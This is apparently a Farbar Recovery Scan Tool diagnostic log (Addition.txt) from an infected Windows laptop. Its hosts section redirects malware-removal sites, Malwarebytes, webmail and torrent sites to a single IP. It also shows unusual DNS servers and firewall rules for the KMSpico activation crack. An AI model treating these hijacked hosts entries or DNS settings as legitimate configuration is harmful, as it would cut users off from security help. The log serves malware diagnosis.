2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32crypt.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._html2.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_multiprocessing.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_yappi.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32process.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\unicodedata.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._animate.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._wizard.pyd 2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pipe.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\select.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32pdh.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32profile.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32ts.pyd 2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dl l 2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\M icrosoft Office\Office15\1033\GrooveIntlResource.dll 2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\M endeley Desktop\Mendeley.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\cpprest100_1_2.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Lib\r1api.dll 2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\videodl.exe ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: AlternateDataStreams: AlternateDataStreams: AlternateDataStreams: AlternateDataStreams:
C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642] C:\ProgramData\TEMP:05E9FFE5 [145] C:\ProgramData\TEMP:5C1D8A71 [138] C:\ProgramData\TEMP:661DFA1C [117] C:\ProgramData\TEMP:DBC416F8 [286]
==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. T he "AlternateShell" will be restored.) ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to d efault or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partition
guru.com -> hxxp://www.partitionguru.com ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers \etc\hosts 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24 199.59.62.24
www.malwaretips.com malwareremovalguides.info onlinevirusrepair.com enigmasoftware.com pcrisk.com malwarebytes.org/ tomshardware.co.uk malwaretips.com answers.yahoo.com www.malwareremovalguides.info www.onlinevirusrepair.com www.enigmasoftware.com www.pcrisk.com guides.yoosecurity.com www.malwarebytes.org/ www.tomshardware.co.uk www.gmail.com gmail.com www.hotmail.com hotmail.com www.mail.ru mail.ru www.torrentz.eu torrentz.eu www.kat.ph kat.ph www.thepiratebay.se thepiratebay.se www.thepiratebay.org thepiratebay.org
There are 356 more lines. ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpap er -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\ DesktopBackground\img0.jpg HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpape r -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg DNS Servers: 82.163.143.171 - 82.163.142.173 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPrompt BehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.)
HKLM\...\StartupApproved\Run: => "Everything" HKLM\...\StartupApproved\Run: => "HotKeysCmds" HKLM\...\StartupApproved\Run: => "IgfxTray" HKLM\...\StartupApproved\Run: => "Persistence" HKLM\...\StartupApproved\Run: => "RtHDVCpl" HKLM\...\StartupApproved\Run: => "TecoResident" HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD" HKLM\...\StartupApproved\Run: => "TCrdMain" HKLM\...\StartupApproved\Run: => "TODDMain" HKLM\...\StartupApproved\Run: => "TosWaitSrv" HKLM\...\StartupApproved\Run32: => "autodetect" HKLM\...\StartupApproved\Run32: => "Everything" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe" HKLM\...\StartupApproved\Run32: => "TPUReg" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFol der: => "Dropbox.lnk" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "G oogle Update" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "I DMan" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S kype" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S creencast-O-Matic Tray" HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "V See" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\ system32\alg.exe FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688 FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Fi les\KMSpico\AutoPico.exe FirewallRules: [{7180087A-69A0-49FC-A8C0-88DDD581BDD7}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow) les\KMSpico\Service_KMS.exe FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow) les\KMSpico\Service_KMS.exe FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow) les\KMSpico\KMSELDI.exe FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow) les\KMSpico\KMSELDI.exe FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow) FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow) les (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow) les (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow) les (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow) les (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow) FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow) les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow) les (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow) les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow) les (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow) les (x86)\Intel\IntelAppStore\bin\ismagent.exe FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow) les (x86)\Spotify\spotify.exe FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow) les (x86)\Spotify\spotify.exe FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow) les (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow) les (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow) RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow) RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow) les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow) les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow) les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow) les (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow) RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow) RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow) les (x86)\IBM\SPSS\Statistics\20\stats.com FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow) les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow) les (x86)\IBM\SPSS\Statistics\20\stats.exe FirewallRules: [{AEE1A837-3B32-4F4E-84D3-C59B67FC0D4F}] => (Allow)
C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi LPort=1688 C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi LPort=3306 C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Users\REVE C:\Users\REVE C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi C:\Users\REVE C:\Users\REVE C:\Program Fi C:\Program Fi C:\Program Fi C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.com FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\stats.exe FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Fi les (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869 FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900 FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Fi les (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Fi les (x86)\Skype\Phone\Skype.exe FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe FirewallRules: [UDP Query User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60 \bin\java.exe FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program fi les (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe ==================== Restore Points ========================= ATTENTION: System Restore is disabled ==================== Faulty Device Manager Devices ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 788: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 776: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 776: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully .) Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: 976: ERROR: read_msg errno 0 (The operation completed successfully. ) Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: ERROR: mDNSPlatformReadTCP - recv: 10053 System errors: ============= Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The User Data Access_560cb16 service terminated unexpectedly. It ha s done this 1 time(s). The following corrective action will be taken in 10000 mi lliseconds: Restart the service. Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The User Data Storage_560cb16 service terminated unexpectedly. It h as done this 1 time(s). The following corrective action will be taken in 10000 m illiseconds: Restart the service. Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The Contact Data_560cb16 service terminated unexpectedly. It has do ne this 1 time(s). The following corrective action will be taken in 10000 millis econds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The Sync Host_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseco nds: Restart the service. Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: ) Description: The master browser has received a server announcement from the comp uter ACER that believes that it is the master browser for the domain on transport NetBT_Tc pip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}. The master browser is stopping or an election is being forced. Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: ) Description: The master browser has received a server announcement from the comp uter LENOVO that believes that it is the master browser for the domain on transport NetBT_Tc pip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}. The master browser is stopping or an election is being forced. Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031 ) (User: ) Description: The UpdateSvc service terminated unexpectedly. It has done this 2 t ime(s). The following corrective action will be taken in 60000 milliseconds: Res tart the service. CodeIntegrity: =================================== Date: 2016-04-06 09:07:15.285 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-06 09:07:15.243 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 14:22:01.468
Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 12:03:02.209 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-04 12:03:02.171 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-04-02 20:08:57.152 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-30 14:43:23.764 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. Date: 2016-03-30 14:29:38.240 Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-30 13:46:03.397 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. Date: 2016-03-30 13:37:25.565 Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz Percentage of memory in use: 53% Total physical RAM: 6027.22 MB Available physical RAM: 2815.9 MB Total Virtual: 8587.22 MB Available Virtual: 4472.3 MB ==================== Drives ================================ Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS Drive h: () (Removable) (Total:7.44 GB) (Free:4.04 GB) FAT32
==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000) Partition: GPT. ======================================================== Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== End of Addition.txt ============================
View more...
Comments